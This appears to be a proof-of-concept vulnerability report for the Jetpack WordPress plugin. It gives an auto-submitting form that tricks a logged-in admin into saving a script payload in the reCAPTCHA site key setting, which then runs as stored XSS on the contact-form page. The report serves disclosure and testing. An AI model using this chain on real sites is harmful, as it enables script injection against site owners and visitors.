This requires Jetpack to be installed and to have a page/post with a Jetpack Contact Form.

Add a post/page containing a Jetpack Contact Form shortcode:

[contact-form][contact-field label="Name" type="name"  required="true" /][contact-field label="Email" type="email" required="true" /][contact-field label="Message" type="textarea" /][/contact-form]

Once there is a form using Jetpack, make a logged in admin open an HTML document containing:

<body onload="document.forms[0].submit()">
    <form action="" method="post">
        <input type="hidden" name="site_key" value='"><script>alert(4)</script>' />
        <input type="hidden" name="secret_key" value='csrf2222' />
        <input type="hidden" name="recaptcha_type" value="v2" />
        <input type="hidden" name="submit" value="Save Changes" />
        <input type="submit" name="enter" id="enter" value="Submit">

View the post/page containing the form and see the XSS